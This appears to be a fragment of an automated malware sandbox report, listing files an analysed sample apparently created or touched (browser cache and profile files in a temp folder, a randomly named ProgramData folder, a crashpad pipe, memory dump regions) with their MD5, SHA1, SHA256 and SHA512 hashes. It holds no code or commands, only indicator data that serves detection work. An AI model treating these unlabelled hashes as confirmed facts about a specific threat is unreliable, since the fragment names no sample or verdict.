C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\index
| MD5 | 7871d57436de3df3f18360417f2c3798 |
| SHA1 | 35ceff73d7ce7b02455fb6ab87ccd6e71e9e5f1f |
| SHA256 | 49fe719cd2b1f7bf361cfc21d28349c41cb3ee9d1e0aeebadf6822df8a452dbb |
| SHA512 | a564e69c3b60b7062adb084c24a84daea6838443556dcf7c4ee2e837590d2ffb569254e864b96f6da09ab2ae77a1460dbaf340ee7302940f9eba7ac87a81ff62 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\db
| MD5 | 491de38f19d0ae501eca7d3d7d69b826 |
| SHA1 | 2ecf6fcf189ce6d35139daf427a781ca66a1eba9 |
| SHA256 | e58156bca5288238d341f5249d3b6c91ab37cef515358953b435339100d0596a |
| SHA512 | 232f5df71e8ec35e500ac81aa54a87b3523fe8a32168096a2a76f08e5c7868100b3cdc5155786ead489aac440beee3f84ffa43d226a5b709c66012923b20c696 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma
| MD5 | 9a31b075da019ddc9903f13f81390688 |
| SHA1 | d5ed5d518c8aad84762b03f240d90a2d5d9d99d3 |
| SHA256 | 95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1 |
| SHA512 | a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat
| MD5 | 1fd2bcf7be677e004a5421b78e261340 |
| SHA1 | 4e5abd04329ee1ffaebe9c04b67deef17f89ff84 |
| SHA256 | f539c848f584add20b43d5daefd614526b67adbf22b0c89eaa7802a8a653cd31 |
| SHA512 | 929499946e38281bd808b37b362c4a86f3b6382eb1ecd5fc094410d3688906d14a114ca930a2cf38b6241ab734bc5959e6fe541270d47ca9538e82a68c99cc77 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State
| MD5 | cc6b5336840cb2b0621e6f9aacb7bb52 |
| SHA1 | b2e2c22810bf6a9f78b4a80ea8ad5dee3fd3b9eb |
| SHA256 | a8fc12cf5392b0d8c1c9d0041ba8d9c7b24eb79f28d25e0d1b571887456ffd60 |
| SHA512 | 2e3b06d265fc34f2be5a578ca5c0f7a5cc0cfb0eb5dfcb7da852c5ce7b59ad98443948241d774d3dfe54a432663de67760ea4416ee54bb5382a6dfe4afd9df3e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version
| MD5 | ef48733031b712ca7027624fff3ab208 |
| SHA1 | da4f3812e6afc4b90d2185f4709dfbb6b47714fa |
| SHA256 | c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99 |
| SHA512 | ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029 |
\??\pipe\crashpad_4928_CRDNQMDASZFGKKWZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\ShaderCache\index
| MD5 | 9621d3749fd19ba2ae290b679e8995fd |
| SHA1 | 0e26bde909949518d487c650773a962813f5dabd |
| SHA256 | e4a73f64860d30710be6f1c7f857de64125e80462bb2e35f2c11ac9c5d9dce9a |
| SHA512 | 96a96b9f3cb61c91f76ba294650556cba781807243e350d3b80084fccb084f93750e1ea139d0d9c3c7833a8b24f92fb91a7eb561619620b7c7a6be47f18e801d |
memory/220-1317-0x0000000000400000-0x0000000002CC9000-memory.dmp
memory/4968-1364-0x00000000006E0000-0x00000000007BD000-memory.dmp
C:\ProgramData\R7C3MVI6IVWQMB8ESG7WVE9BH\files\temp
| MD5 | e7501ce0f4cf197e5e05f7f846d6facf |
| SHA1 | 26d04d02bc9c6e49704efc5d32aae351ec8af523 |
| SHA256 | d87549765562b13075c4dd6979dfb5046e2dc96a9138d0bf258e9573ce5ab602 |
| SHA512 | 30aafd9241286690f2423759cc95a9fd4e9778e52a11516bc2ea8ea0c07cf3c7b9fa9b39720251b39dd5b8922471421473548dc1aeb6adfbc7a8d26b0c99039c |
C:\ProgramData\R7C3MVI6IVWQMB8ESG7WVE9BH\files\temp
| MD5 | e3bad5a8407ce8be2e003acd06598035 |
| SHA1 | a6bc025a692ae74493b231311373d214b72fd9b1 |
| SHA256 | 29a8f30850aa6f08ad492c71594de5844e11ab1a9bc4b8e0432b137fb8ca2d69 |
| SHA512 | cce663e7318c9a9723a676e100dc77c47399f3ca3c25729781eddd4c63e7797c93ccca34c49a0eb725806691ffbec2699dd7d450f14cbbaeff8a3bb07a57e082 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\1f2fbd51-a573-4952-afee-1ced03a2d9b5.tmp
| MD5 | e9601b83d6a34f05e9bcb34ef5a198fd |
| SHA1 | 8d95a7b2e29b8647256cd8be31eee7ed7a39146a |
| SHA256 | e6e8cd768d20ebd26d3fc502019028f66fa58fe38f539273775366e0dda36e11 |
| SHA512 | bee6a475c6a672bc1a8368f4b0772a0b7224cf790eb03b98ee2829ccaa5092568d092054c2c449c5f2dfb3aea2489c094896a3fe7e74d4966ac385d46ea3cfc1 |
memory/4968-1403-0x00007FFD858A0000-0x00007FFD85923000-memory.dmp